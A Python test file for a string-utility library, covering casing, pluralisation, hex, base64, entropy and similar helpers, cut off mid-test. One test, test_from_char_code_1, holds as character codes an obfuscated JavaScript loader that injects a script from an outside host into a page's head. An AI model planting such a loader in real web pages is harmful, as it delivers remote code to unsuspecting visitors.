    assert is_singular('dog')

    assert not is_singular('adversaries')
    assert is_singular('adversary')

    assert is_singular('foo')


def test_cardinalize_1():
    assert cardinalize('dog', 1) == 'dog'
    assert cardinalize('dog', 2) == 'dogs'

    assert cardinalize('dogs', 1) == 'dog'
    assert cardinalize('dogs', 2) == 'dogs'


def test_a10n_1():
    result = a10n('abbreviation')
    assert result == 'a10n'

    result = a10n('internationalization')
    assert result == 'i18n'

    result = a10n('foo')
    assert result == 'foo'

    result = a10n('ab')
    assert result == 'ab'


def test_unicode_to_ascii_docs_1():
    s = 'Klüft skräms inför på fédéral électoral große'
    assert unicode_to_ascii(s) == 'Kluft skrams infor pa federal electoral groe'


def test_string_replace_index_1():
    assert string_replace_index('abc', 0, 'x') == 'xbc'
    assert string_replace_index('abc', 1, 'x') == 'axc'
    assert string_replace_index('abc', 2, 'x') == 'abx'
    with pytest.raises(IndexError):
        string_replace_index('abc', 3, 'x')


def test_string_remove_index_1():
    assert string_remove_index('abc', 0) == 'bc'
    assert string_remove_index('abc', 1) == 'ac'
    assert string_remove_index('abc', 2) == 'ab'
    with pytest.raises(IndexError):
        string_remove_index('abc', 3)


def test__handle_casing_1():
    with pytest.raises(ValueError):
        _handle_casing('foo', 'bar')


# def test_sentence_case_1():
#     assert sentence_case('this is just a test') == 'This is just a test'


def test_string_remove_non_alpha_numeric_characters_1():
    result = string_remove_non_alpha_numeric_characters('foobar!@#!@#!test')
    assert result == 'foobartest'


def test_string_find_between_1():
    result = string_find_between('foobar', 'f', 'b')
    assert result == 'oo'

    result = string_find_between('foobar', 'o', 'b')
    assert result == 'o'

    result = string_find_between('foobar', 'o', 'o')
    assert result == ''

    result = string_find_between('foobarfoobar', 'f', 'b')
    assert result == 'oobarfoo'

    result = string_find_between('foo.bar', 'f', '.')
    assert result == 'oo'

    result = string_find_between('foobar', 'g', 'r')
    assert result == ''


def test_strings_similarity_1():
    result = strings_similarity('foobar', 'foolbat')
    assert result == 0.7692307692307693


# def test_string_words_1():
#     result = string_words('In the beginning was the Word...')
#     assert result == ['In', 'the', 'beginning', 'was', 'the', 'Word']


def test_string_is_yes_1():
    assert string_is_yes('y')
    assert string_is_yes('Y')
    assert string_is_yes('yes')
    assert string_is_yes('YES')
    assert string_is_yes('Yes')
    assert string_is_yes('YeS')

    assert not string_is_yes('yyes')
    assert not string_is_yes('yess')


def test_string_is_no_1():
    assert string_is_no('n')
    assert string_is_no('N')
    assert string_is_no('no')
    assert string_is_no('NO')
    assert string_is_no('No')
    assert string_is_no('nO')

    assert not string_is_no('nno')
    assert not string_is_no('noo')
    assert not string_is_no('none')


def test_text_consonants_1():
    result = text_consonants('foobar')
    assert result == ['f', 'b', 'r']


def test_text_consonant_count_1():
    result = text_consonant_count('foobar')
    assert result == 3


def test_text_vowels_1():
    result = text_vowels('foobar')
    assert result == ['o', 'o', 'a']


def test_text_vowel_count_1():
    result = text_vowel_count('foobar')
    assert result == 3


def test_switch_1():
    result = switch('foo', 'bar', 'foobar foo bar')
    assert result == 'barfoo bar foo'


def test_character_examples_1():
    result = character_examples()
    assert len(result) == 10
    assert isinstance(result[0], str)

    result = character_examples(n=100)
    assert len(result) == 100
    assert isinstance(result[0], str)


def test_text_examples_1():
    result = text_examples()
    assert len(result) == 10
    assert isinstance(result[0], str)

    result = text_examples(n=100)
    assert len(result) == 100
    assert isinstance(result[0], str)


def test_string_common_prefix_1():
    result = string_common_prefix('foobar', 'foolbar')
    assert result == 'foo'

    result = string_common_prefix('abc', 'xyz')
    assert result == ''

    result = string_common_prefix(' ! a', ' ! a')
    assert result == ' ! a'


def test_string_common_suffix_1():
    result = string_common_suffix('foobar', 'foolbar')
    assert result == 'bar'

    result = string_common_suffix('abc', 'xyz')
    assert result == ''

    result = string_common_suffix(' ! a', ' ! a')
    assert result == ' ! a'


def test_string_remove_before_1():
    result = string_remove_before('foobar', 'b')
    assert result == 'bar'

    result = string_remove_before('https://example.com', '://')
    assert result == '://example.com'


def test_string_remove_after_1():
    result = string_remove_after('foobar', 'b')
    assert result == 'foob'

    result = string_remove_after('foobar', 'o')
    assert result == 'foo'

    result = string_remove_after('https://example.com', '://')
    assert result == 'https://'


def test_string_is_palindrome_1():
    assert not string_is_palindrome('foo')
    assert string_is_palindrome('foof')
    assert string_is_palindrome('amanaplanacanalpanama')


def test_string_remove_unicode_1():
    results = string_remove_unicode('τεστΤΕΣΤtest')
    assert results == 'test'

    results = string_remove_unicode('abc\u200bdef')
    assert results == 'abcdef'


def test_text_ascii_characters_1():
    results = tuple(text_ascii_characters('τεστtest'))
    assert results == ('t', 'e', 's', 't')


def test_text_non_ascii_characters_1():
    results = tuple(text_non_ascii_characters('τεστtest'))
    assert results == ('τ', 'ε', 'σ', 'τ')


def test_indefinite_article_1():
    assert indefinite_article('historian') == 'a'
    assert indefinite_article('turtle') == 'a'
    assert indefinite_article('iguana') == 'an'


def test_pluralize_docs_1():
    assert pluralize('test') == 'tests'
    assert pluralize('Test') == 'Tests'
    assert pluralize('TEST') == 'TESTS'
    assert pluralize('adversary') == 'adversaries'
    assert pluralize('intrusion set') == 'intrusion sets'
    assert pluralize('byte') == 'bytes'
    # title-cased words are not pluralized properly (I think because they are considered proper nouns)
    assert pluralize('Adversary') == 'Adversarys'
    assert pluralize('elephants') == 'elephants'


def test_singularize_docs_1():
    assert singularize('tests') == 'test'
    assert singularize('adversaries') == 'adversary'
    # TODO (nov 2020): this assertion used to work, but is now failing once the is_singular check was added to the singularize function
    # assert singularize('intrusion sets') == 'intrusion set'
    assert singularize('elephant') == 'elephant'


def test_string_forms_1():
    assert string_forms('dog') == {
        'lowercase': 'dog',
        'titlecase': 'Dog',
        'uppercase': 'DOG',
        'lowercasePlural': 'dogs',
        'titlecasePlural': 'Dogs',
        'uppercasePlural': 'DOGS',
        'kebab_case': 'dog',
        'kebab_casePlural': 'dogs',
        'snake_case': 'dog',
        'snake_casePlural': 'dogs',
        'camel_case': 'dog',
        'camel_casePlural': 'dogs',
        'pascal_case': 'Dog',
        'pascal_casePlural': 'Dogs',
        'lowercaseIndefiniteArticle': 'a',
        'titlecaseIndefiniteArticle': 'A',
        'uppercaseIndefiniteArticle': 'A',
    }

    assert string_forms('iguana') == {
        'lowercase': 'iguana',
        'titlecase': 'Iguana',
        'uppercase': 'IGUANA',
        'lowercasePlural': 'iguanas',
        'titlecasePlural': 'Iguanas',
        'uppercasePlural': 'IGUANAS',
        'kebab_case': 'iguana',
        'kebab_casePlural': 'iguanas',
        'snake_case': 'iguana',
        'snake_casePlural': 'iguanas',
        'camel_case': 'iguana',
        'camel_casePlural': 'iguanas',
        'pascal_case': 'Iguana',
        'pascal_casePlural': 'Iguanas',
        'lowercaseIndefiniteArticle': 'an',
        'titlecaseIndefiniteArticle': 'An',
        'uppercaseIndefiniteArticle': 'AN',
    }

    assert string_forms('fat dog') == {
        'lowercase': 'fat dog',
        'titlecase': 'Fat Dog',
        'uppercase': 'FAT DOG',
        'lowercasePlural': 'fat dogs',
        'titlecasePlural': 'Fat Dogs',
        'uppercasePlural': 'FAT DOGS',
        'kebab_case': 'fat-dog',
        'kebab_casePlural': 'fat-dogs',
        'snake_case': 'fat_dog',
        'snake_casePlural': 'fat_dogs',
        'camel_case': 'fatDog',
        'camel_casePlural': 'fatDogs',
        'pascal_case': 'FatDog',
        'pascal_casePlural': 'FatDogs',
        'lowercaseIndefiniteArticle': 'a',
        'titlecaseIndefiniteArticle': 'A',
        'uppercaseIndefiniteArticle': 'A',
    }

    assert string_forms('ignorant dog') == {
        'lowercase': 'ignorant dog',
        'titlecase': 'Ignorant Dog',
        'uppercase': 'IGNORANT DOG',
        'lowercasePlural': 'ignorant dogs',
        'titlecasePlural': 'Ignorant Dogs',
        'uppercasePlural': 'IGNORANT DOGS',
        'kebab_case': 'ignorant-dog',
        'kebab_casePlural': 'ignorant-dogs',
        'snake_case': 'ignorant_dog',
        'snake_casePlural': 'ignorant_dogs',
        'camel_case': 'ignorantDog',
        'camel_casePlural': 'ignorantDogs',
        'pascal_case': 'IgnorantDog',
        'pascal_casePlural': 'IgnorantDogs',
        'lowercaseIndefiniteArticle': 'an',
        'titlecaseIndefiniteArticle': 'An',
        'uppercaseIndefiniteArticle': 'AN',
    }


def test_string_to_bool_1():
    assert not string_to_bool('false')
    assert not string_to_bool('False')
    assert not string_to_bool('FALSE')
    assert not string_to_bool('FalsE')

    assert string_to_bool('true')
    assert string_to_bool('True')
    assert string_to_bool('TRUE')

    assert string_to_bool('foo')


def test_string_insert_1():
    assert string_insert('foo', '!', 0) == '!foo'
    assert string_insert('foo', '!', 1) == 'f!oo'
    assert string_insert('foo', '!', 2) == 'fo!o'
    assert string_insert('foo', '!', 3) == 'foo!'

    assert string_insert('foo', 'bar', 0) == 'barfoo'
    assert string_insert('foo', 'bar', 1) == 'fbaroo'
    assert string_insert('foo', 'bar', 2) == 'fobaro'
    assert string_insert('foo', 'bar', 3) == 'foobar'


def test_string_add_to_start_of_each_line_1():
    s = '''foo
bar
buzz
bang'''
    assert (
        string_add_to_start_of_each_line(s, '#')
        == '''foo
#bar
#buzz
#bang'''
    )

    assert (
        string_add_to_start_of_each_line(s, '# ')
        == '''foo
# bar
# buzz
# bang'''
    )

    s = '''
        foo
        bar
        '''

    assert (
        string_add_to_start_of_each_line(s, '#')
        == '''
#        foo
#        bar
#        '''
    )


def test_string_has_index_1():
    assert not string_has_index('foo', -1)
    assert string_has_index('foo', 0)
    assert string_has_index('foo', 1)
    assert string_has_index('foo', 2)
    assert not string_has_index('foo', 3)
    assert not string_has_index('foo', 4)
    assert not string_has_index('foo', 4000)


def test_string_remove_numbers_1():
    assert (
        string_remove_numbers('there were 2 pigeons on a wall when 1 fell off and found 4 cats...')
        == 'there were   pigeons on a wall when   fell off and found   cats...'
    )
    assert (
        string_remove_numbers('there were 2 pigeons on a wall when 1 fell off and found 4 cats...', replacement='!')
        == 'there were ! pigeons on a wall when ! fell off and found ! cats...'
    )


def test_string_left_pad_1():
    assert string_left_pad('foo', 10, padding_characters=' ') == '       foo'
    assert string_left_pad('foo', 10) == '       foo'

    assert string_left_pad('foo', 10, padding_characters='.') == '.......foo'


def test_string_left_pad_multiple_padding_characters():
    assert string_left_pad('foo', 7, padding_characters='+=') == '+=+=foo'
    assert string_left_pad('foo', 9, padding_characters='_--') == '_--_--foo'

    with pytest.raises(ValueError):
        string_left_pad('foo', 7, padding_characters='_--')


def test_string_left_pad_length_equals_string_length():
    assert string_left_pad('foo', 3) == 'foo'
    assert string_left_pad('foo', 3, padding_characters='.') == 'foo'
    assert string_left_pad('foo', 3, padding_characters='+=') == 'foo'


def test_string_remove_1():
    s = string_remove('1', '110010')
    assert s == '000'

    s = string_remove('1', '110010', count=1)
    assert s == '10010'


def test_string_remove_from_start_1():
    s = string_remove_from_start('foobar', 'foo')
    assert s == 'bar'

    # make sure nothing is removed
    s = string_remove_from_start('foobar', 'bar')
    assert s == 'foobar'

    s = string_remove_from_start('110010', '11')
    assert s == '0010'


def test_string_remove_from_end_1():
    s = string_remove_from_end('foobar', 'bar')
    assert s == 'foo'

    # make sure nothing is removed
    s = string_remove_from_end('foobar', 'foo')
    assert s == 'foobar'

    s = string_remove_from_end('110010', '10')
    assert s == '1100'


def test_string_split_multiple_1():
    s = '1'
    results = string_split_multiple(s, ' ', '|')
    assert results == ['1']

    results = string_split_multiple(s, ' ')
    assert results == ['1']

    s = '1 2'
    results = string_split_multiple(s, ' ', '|')
    assert results == ['1', '2']

    results = string_split_multiple(s, '|', ' ')
    assert results == ['1', '2']

    results = string_split_multiple(s, ' ')
    assert results == ['1', '2']

    results = string_split_multiple(s, '|')
    assert results == ['1 2']

    s = '1 2|3'
    results = string_split_multiple(s, ' ', '|')
    assert results == ['1', '2', '3']

    results = string_split_multiple(s, '|', ' ')
    assert results == ['1', '2', '3']

    results = string_split_multiple(s, ' ')
    assert results == ['1', '2|3']

    results = string_split_multiple(s, '|')
    assert results == ['1 2', '3']


def test_string_split_multiple_2():
    s = '1 2|3-4=5'
    results = string_split_multiple(s, ' ', '|', '-', '=', '!')
    assert results == ['1', '2', '3', '4', '5']

    s = '1 2 3'
    results = string_split_multiple(s, ' ', '|', '-', '=', '!')
    assert results == ['1', '2', '3']

    s = '1 2 3'
    results = string_split_multiple(s, ' ')
    assert results == ['1', '2', '3']

    s = '1 2 3'
    results = string_split_multiple(s, '|')
    assert results == ['1 2 3']


def test_uppercase_1():
    result = uppercase('foo bar')
    assert result == 'FOO BAR'


def test_string_has_multiple_consecutive_spaces_1():
    assert not string_has_multiple_consecutive_spaces('')
    assert not string_has_multiple_consecutive_spaces(' ')
    assert string_has_multiple_consecutive_spaces('  ')
    assert string_has_multiple_consecutive_spaces('   ')
    assert string_has_multiple_consecutive_spaces('    ')


def test_string_has_multiple_consecutive_spaces_2():
    assert not string_has_multiple_consecutive_spaces('foo bar bing boo buzz')
    assert string_has_multiple_consecutive_spaces('foo bar  bing boo buzz')
    assert string_has_multiple_consecutive_spaces('foo bar   bing boo buzz')
    assert not string_has_multiple_consecutive_spaces('foo bar \n bing boo buzz')


def test_text_abbreviate_1():
    assert text_abbreviate('ping ping') == 'PP'
    assert text_abbreviate('Federal Bureau of Investigation') == 'FBI'
    assert text_abbreviate('United Kingdom') == 'UK'
    assert text_abbreviate('hello') == 'H'
    assert text_abbreviate('pingPong') == 'PP'
    assert text_abbreviate('PingPong') == 'PP'
    assert text_abbreviate('Federal_Bureau-ofInvestigation') == 'FBI'


def test_lowercase_1():
    assert lowercase('ABc') == 'abc'


def test_bytes_decode_as_string_1():
    assert bytes_decode_as_string(b'foo') == 'foo'
    assert bytes_decode_as_string(b'bar') == 'bar'
    assert bytes_decode_as_string('foo') == 'foo'


def test_string_encode_as_bytes_1():
    assert string_encode_as_bytes('foo') == b'foo'
    assert string_encode_as_bytes('bar') == b'bar'


def test_character_to_unicode_number_1():
    assert character_to_unicode_number('a') == 97


def test_hex_to_string_1():
    s = '66 6f 6f 62 61 72'
    assert hex_to_string(s) == 'foobar'

    s = '666f6f626172'
    assert hex_to_string(s) == 'foobar'

    s = '666f6f6 26172'
    assert hex_to_string(s) == 'foobar'

    s = '666f6f 626172'
    assert hex_to_string(s) == 'foobar'

    # see https://github.com/democritus-project/democritus-strings/issues/5
    # s = '\xd0\xb2\xd0\xba'
    # assert hex_to_string(s) == 'foobar'

    s = 'foobar'
    with pytest.raises(ValueError):
        hex_to_string(s)


def test_characters_1():
    assert characters('foobar') == ('f', 'o', 'o', 'b', 'a', 'r')


def test_substrings_1():
    substrings('more') == ['m', 'o', 'r', 'e', 'mo', 'or', 're', 'mor', 'ore', 'more']


def test_string_get_closes_matches_1():
    closest_matches = string_get_closes_matches("appel", ["ape", "apple", "peach", "puppy"])
    assert len(closest_matches) == 2
    assert 'ape' in closest_matches
    assert 'apple' in closest_matches

    closest_matches = string_get_closes_matches('foo', ['fake', 'fun', 'fou', 'foust', 'fang', 'bing'], cutoff=0.4)
    assert len(closest_matches) == 2
    assert 'fou' in closest_matches
    assert 'foust' in closest_matches

    closest_matches = string_get_closes_matches('foo', ['fake', 'fun', 'fou', 'foust', 'fang', 'bing'])
    assert len(closest_matches) == 1
    assert 'fou' in closest_matches


def test_strings_diff_1():
    print(strings_diff('abc', 'abd'))
    assert strings_diff('abc', 'abd') == "- abc\n+ abd"


def test_strings_diff_2():
    a = """abcdef\nthis may be a\ntest"""
    b = """abcdef\nthis may be a\njest"""

    result = strings_diff(a, b)
    print('result <<<{}>>>'.format(result))
    assert (
        result
        == """  abcdef
  this may be a
- test
? ^

+ jest
? ^
"""
    )


def test_string_in_iterable_fuzzy_1():
    assert string_in_iterable_fuzzy('test', ['testing'])
    assert string_in_iterable_fuzzy('foo', ['foo', 'b', 'a'])
    assert not string_in_iterable_fuzzy('bang', ['foo', 'b', 'a'])


def test_strings_diff_opcodes_1():
    op_codes = strings_diff_opcodes('abce', 'abde')
    assert len(op_codes) == 3
    assert op_codes[0] == ('equal', 0, 2, 0, 2)
    assert op_codes[1] == ('replace', 2, 3, 2, 3)
    assert op_codes[2] == ('equal', 3, 4, 3, 4)


def test_strings_matching_blocks_1():
    import difflib

    matching_blocks = strings_matching_blocks('abc', 'abd')
    assert len(matching_blocks) == 2
    assert matching_blocks[0] == difflib.Match(a=0, b=0, size=2)
    assert matching_blocks[1] == difflib.Match(a=3, b=3, size=0)


def test_strings_longest_matching_block_1():
    import difflib

    result = strings_longest_matching_block('abc', 'abd')
    assert result == difflib.Match(a=0, b=0, size=2)
    assert result.a == 0
    assert result.b == 0
    assert result.size == 2


def test_string_as_numbers():
    assert string_as_numbers('london') == [12, 15, 14, 4, 15, 14]
    assert string_as_numbers('fair') == [6, 1, 9, 18]


def test_text_join_1():
    assert text_join('/', 'a/', 'b//', '/c') == 'a//b////c'


def test_string_shorten():
    assert string_shorten('test', 3) == '...'
    assert string_shorten('test', 4) == 'test'
    assert string_shorten('testing', 4) == 't...'
    assert string_shorten('this is just a test', 10) == 'this is...'
    assert string_shorten('test', 100) == 'test'


def test_string_to_hex_1():
    assert string_to_hex('a') == '61'
    assert string_to_hex('test') == '74657374'
    assert string_to_hex('test', seperator=' ') == '74 65 73 74'


def test_string_split_without_empty_1():
    assert string_split_without_empty('https://tc.hightower.space/post/playbook-apps/array-iterator/', '/') == [
        'https:',
        'tc.hightower.space',
        'post',
        'playbook-apps',
        'array-iterator',
    ]


def test_base64_encode_1():
    assert base64_encode('Hello, world') == 'SGVsbG8sIHdvcmxk'
    assert base64_encode('ich bin ein mann') == 'aWNoIGJpbiBlaW4gbWFubg=='


def test_base64_decode_1():
    assert base64_decode('SGVsbG8sIHdvcmxk') == 'Hello, world'
    assert base64_decode('aWNoIGJpbiBlaW4gbWFubg==') == 'ich bin ein mann'
    assert (
        base64_decode('R8szXOTyFtDM_Aac-LrgCg').encode('utf-8')
        == b'G\xc3\x8b3\\\xc3\xa4\xc3\xb2\x16\xc3\x90\xc3\x8c\x01\xc2\xa7\x0b\xc2\xae\x00\xc2\xa0'
    )


def test_letter_as_number_1():
    assert letter_as_number('a') == 1
    assert letter_as_number('A') == 1
    assert letter_as_number('b') == 2


def test_from_char_code_1():
    """This test was taken from: https://gist.github.com/jonmarkgo/3431818. I am not responsible for malicious use or outcomes of having this as a test case."""
    input_char_codes = [
        118,
        97,
        114,
        32,
        115,
        111,
        109,
        101,
        115,
        116,
        114,
        105,
        110,
        103,
        32,
        61,
        32,
        100,
        111,
        99,
        117,
        109,
        101,
        110,
        116,
        46,
        99,
        114,
        101,
        97,
        116,
        101,
        69,
        108,
        101,
        109,
        101,
        110,
        116,
        40,
        39,
        115,
        99,
        114,
        105,
        112,
        116,
        39,
        41,
        59,
        32,
        115,
        111,
        109,
        101,
        115,
        116,
        114,
        105,
        110,
        103,
        46,
        116,
        121,
        112,
        101,
        32,
        61,
        32,
        39,
        116,
        101,
        120,
        116,
        47,
        106,
        97,
        118,
        97,
        115,
        99,
        114,
        105,
        112,
        116,
        39,
        59,
        32,
        115,
        111,
        109,
        101,
        115,
        116,
        114,
        105,
        110,
        103,
        46,
        97,
        115,
        121,
        110,
        99,
        32,
        61,
        32,
        116,
        114,
        117,
        101,
        59,
        115,
        111,
        109,
        101,
        115,
        116,
        114,
        105,
        110,
        103,
        46,
        115,
        114,
        99,
        32,
        61,
        32,
        83,
        116,
        114,
        105,
        110,
        103,
        46,
        102,
        114,
        111,
        109,
        67,
        104,
        97,
        114,
        67,
        111,
        100,
        101,
        40,
        49,
        48,
        52,
        44,
        32,
        49,
        49,
        54,
        44,
        32,
        49,
        49,
        54,
        44,
        32,
        49,
        49,
        50,
        44,
        32,
        49,
        49,
        53,
        44,
        32,
        53,
        56,
        44,
        32,
        52,
        55,
        44,
        32,
        52,
        55,
        44,
        32,
        49,
        48,
        49,
        44,
        32,
        49,
        50,
        48,
        44,
        32,
        57,
        55,
        44,
        32,
        49,
        48,
        57,
        44,
        32,
        49,
        48,
        52,
        44,
        32,
        49,
        49,
        49,
        44,
        32,
        49,
        48,
        57,
        44,
        32,
        49,
        48,
        49,
        44,
        32,
        52,
        54,
        44,
        32,
        49,
        49,
        48,
        44,
        32,
        49,
        48,
        49,
        44,
        32,
        49,
        49,
        54,
        44,
        32,
        52,
        55,
        44,
        32,
        49,
        49,
        53,
        44,
        32,
        49,
        49,
        54,
        44,
        32,
        57,
        55,
        44,
        32,
        49,
        49,
        54,
        44,
        32,
        52,
        54,
        44,
        32,
        49,
        48,
        54,
        44,
        32,
        49,
        49,
        53,
        44,
        32,
        54,
        51,
        44,
        32,
        49,
        49,
        56,
        44,
        32,
        54,
        49,
        44,
        32,
        52,
        57,
        44,
        32,
        52,
        54,
        44,
        32,
        52,
        56,
        44,
        32,
        52,
        54,
        44,
        32,
        52,
        57,
        41,
        59,
        32,
        32,
        32,
        118,
        97,
        114,
        32,
        97,
        108,
        108,
        115,
        32,
        61,
        32,
        100,
        111,
        99,
        117,
        109,
        101,
        110,
        116,
        46,
        103,
        101,
        116,
        69,
        108,
        101,
        109,
        101,
        110,
        116,
        115,
        66,
        121,
        84,
        97,
        103,
        78,
        97,
        109,
        101,
        40,
        39,
        115,
        99,
        114,
        105,
        112,
        116,
        39,
        41,
        59,
        32,
        118,
        97,
        114,
        32,
        110,
        116,
        51,
        32,
        61,
        32,
        116,
        114,
        117,
        101,
        59,
        32,
        102,
        111,
        114,
        32,
        40,
        32,
        118,
        97,
        114,
        32,
        105,
        32,
        61,
        32,
        97,
        108,
        108,
        115,
        46,
        108,
        101,
        110,
        103,
        116,
        104,
        59,
        32,
        105,
        45,
        45,
        59,
        41,
        32,
        123,
        32,
        105,
        102,
        32,
        40,
        97,
        108,
        108,
        115,
        91,
        105,
        93,
        46,
        115,
        114,
        99,
        46,
        105,
        110,
        100,
        101,
        120,
        79,
        102,
        40,
        83,
        116,
        114,
        105,
        110,
        103,
        46,
        102,
        114,
        111,
        109,
        67,
        104,
        97,
        114,
        67,
        111,
        100,
        101,
        40,
        49,
        48,
        49,
        44,
        32,
        49,
        50,
        48,
        44,
        32,
        57,
        55,
        44,
        32,
        49,
        48,
        57,
        44,
        32,
        49,
        48,
        52,
        44,
        32,
        49,
        49,
        49,
        44,
        32,
        49,
        48,
        57,
        44,
        32,
        49,
        48,
        49,
        41,
        41,
        32,
        62,
        32,
        45,
        49,
        41,
        32,
        123,
        32,
        110,
        116,
        51,
        32,
        61,
        32,
        102,
        97,
        108,
        115,
        101,
        59,
        125,
        32,
        125,
        32,
        105,
        102,
        40,
        110,
        116,
        51,
        32,
        61,
        61,
        32,
        116,
        114,
        117,
        101,
        41,
        123,
        100,
        111,
        99,
        117,
        109,
        101,
        110,
        116,
        46,
        103,
        101,
        116,
        69,
        108,
        101,
        109,
        101,
        110,
        116,
        115,
        66,
        121,
        84,
        97,
        103,
        78,
        97,
        109,
        101,
        40,
        34,
        104,
        101,
        97,
        100,
        34,
        41,
        91,
        48,
        93,
        46,
        97,
        112,
        112,
        101,
        110,
        100,
        67,
        104,
        105,
        108,
        100,
        40,
        115,
        111,
        109,
        101,
        115,
        116,
        114,
        105,
        110,
        103,
        41,
        59,
        32,
        125,
    ]
    result = from_char_code(input_char_codes)
    assert (
        result
        == """var somestring = document.createElement('script'); somestring.type = 'text/javascript'; somestring.async = true;somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 49, 46, 48, 46, 49);   var alls = document.getElementsByTagName('script'); var nt3 = true; for ( var i = alls.length; i--;) { if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName("head")[0].appendChild(somestring); }"""
    )


def test_string_rotate_1():
    assert string_rotate('Hello, World!') == 'Uryyb, Jbeyq!'
    assert string_rotate('Gur Mra bs Clguba, ol Gvz Crgref') == 'The Zen of Python, by Tim Peters'
    assert string_rotate('abc', 0) == 'abc'
    assert string_rotate('abc', 1) == 'bcd'
    assert string_rotate('abc', 12) == 'mno'
    assert string_rotate('abc', 13) == 'nop'
    assert string_rotate('abc', 25) == 'zab'
    assert string_rotate('abc', 26) == 'abc'
    assert string_rotate('abc', 27) == 'bcd'


def test_xor_1():
    assert xor('test', 'abc') == xor(b'test', b'abc') == xor(b'test', b'abca') == '\x15\x07\x10\x15'


def test_hamming_distance_1():
    assert hamming_distance('karolin', 'kathrin') == 3
    assert hamming_distance('karolin', 'kerstin') == 3
    assert hamming_distance('1011101', '1001001') == 2
    assert hamming_distance('2173896', '2233796') == 3

    assert hamming_distance('abc', 'abd') == 1
    assert hamming_distance('abc', 'cba') == 2

    with pytest.raises(ValueError):
        assert hamming_distance('abc', 'a')

    assert hamming_distance('abc', 'abd', as_percent=True) == 33.33
    assert hamming_distance('abc', 'cba', as_percent=True) == 66.67


def test_hamming_distance_lists():
    assert hamming_distance([1, 2, 3, 4], [1, 2, 4, 5]) == 2
    assert hamming_distance([1, 2, 3, 4], [1, 2, 4, 5], as_percent=True) == 50.0


def test_string_entropy_1():
    assert string_entropy('aA') == 1
    assert string_entropy('aA', ignore_case=True) == 0.0
    assert string_entropy('gargleblaster') == 2.931208948910323
    assert string_entropy('tripleee') == 2.4056390622295662
    assert string_entropy('aaa') == 0
    assert string_entropy('') == 0
    assert string_entropy('7&wS/p(') == 2.8073549220576046
    assert string_entropy('in the beginning was the word') == 3.5780011510322707
    assert string_entropy('Ἐν ἀρχῇ ἦν ὁ Λόγος, καὶ ὁ Λόγος ἦν πρὸς τὸν Θεόν, καὶ Θεὸς ἦν ὁ Λόγος.') == 4.105729581348616


def test_string_entropy_word_repetition():
    a = string_entropy('this is a test of a test of a test')
    b = string_entropy('this is a test of a test of a foo')
    c = string_entropy('this is a test of a test of an foo')
    d = string_entropy('this is a test of a boo of an foo')

    assert a < b < c < d


@repeat_concurrently(10)
def run_crazy_case_repeatedly():
    s = crazycase('this is a test')
    if uppercase_count(s) > 1 and lowercase_count(s) > 1:
        return True
    else:
        return False


def test_crazycase_1():
    # I'm testing the crazycase function in this way because sometimes, the crazy case function will return a string with all lowercase or uppercase values. It is a rare occurrence, but it does happen and is possible.
    results = run_crazy_case_repeatedly()
    assert results.count(True) >= 9


def test_uppercase_count_1():
    assert uppercase_count('this iS a TeST') == 4


def test_lowercase_count_1():
    assert lowercase_count('this iS a TeST') == 7


def test_kebab_case_1():
    assert kebab_case('test ing foo bar') == 'test-ing-foo-bar'


def test_snake_case_1():
    assert snake_case('test ing foo bar') == 'test_ing_foo_bar'


def test_camel_case_1():
    assert camel_case('test ing foo bar') == 'testIngFooBar'


def test_pascal_case_1():
    assert pascal_case('test ing foo bar') == 'TestIngFooBar'


def test_unicode_number_to_character_1():
    assert unicode_number_to_character(65) == 'A'
    assert unicode_number_to_character(94) == '^'


def test_lowercase_first_letter_1():
    assert lowercase_first_letter('Atest') == 'atest'
    assert lowercase_first_letter('ATeSt') == 'aTeSt'


def test_uppercase_first_letter_1():
    assert uppercase_first_letter('atest') == 'Atest'
    assert uppercase_first_letter('aTeSt') == 'ATeSt'


def test_text_to_leet_speak():
    assert text_to_leet_speak('elite') == '3l1t3'
    assert text_to_leet_speak('foo bar') == 'f00 b4r'


def test_leet_speak_to_text():
    assert leet_speak_to_text('f00 b4r') == 'foo bar'
    assert leet_speak_to_text('3l1t3') == 'elite'


def test_string_split_on_uppercase_systematic():
    s = 'Abc'
    assert string_split_on_uppercase(s) == ['bc']

    s = 'aBc'
    assert string_split_on_uppercase(s) == ['a', 'c']

    s = 'abC'
    assert string_split_on_uppercase(s) == ['ab']

    s = 'ABc'
    assert string_split_on_uppercase(s) == ['c']

    s = 'AbC'
    assert string_split_on_uppercase(s) == ['b']

    s = 'Abc'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['Abc']

    s = 'aBc'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['a', 'Bc']

    s = 'abC'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['ab', 'C']

    s = 'ABc'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['A', 'Bc']

    s = 'AbC'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['Ab', 'C']

    s = 'ABc'
    assert string_split_on_uppercase(s, include_uppercase_characters=True, split_acronyms=False) == ['ABc']

    s = 'AbC'
    assert string_split_on_uppercase(s, include_uppercase_characters=True, split_acronyms=False) == ['Ab', 'C']

    s = 'aBC'
    assert string_split_on_uppercase(s, include_uppercase_characters=True, split_acronyms=False) == ['a', 'BC']

    with pytest.raises(ValueError):
        # try an invalid combination of kwargs
        string_split_on_uppercase(s, include_uppercase_characters=False, split_acronyms=False) == ['a', 'BC']


def test_string_split_on_uppercase_1():
    s = 'fooBarTest'
    assert string_split_on_uppercase(s) == ['foo', 'ar', 'est']

    s = 'This is a test'
    assert string_split_on_uppercase(s) == ['his is a test']

    s = 'This is a Test'
    assert string_split_on_uppercase(s) == ['his is a ', 'est']

    s = 'FoobaR'
    assert string_split_on_uppercase(s) == ['ooba']


def test_string_split_on_uppercase_including_uppercase_characters():
    s = 'fooBarTest'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['foo', 'Bar', 'Test']

    s = 'This is a test'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['This is a test']

    s = 'This is a Test'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['This is a ', 'Test']

    s = 'FoobaR'
    assert string_split_on_uppercase(s, include_uppercase_characters=True) == ['Fooba', 'R']


def test_string_split_on_lowercase_1():
    s = 'FOObARtEST'
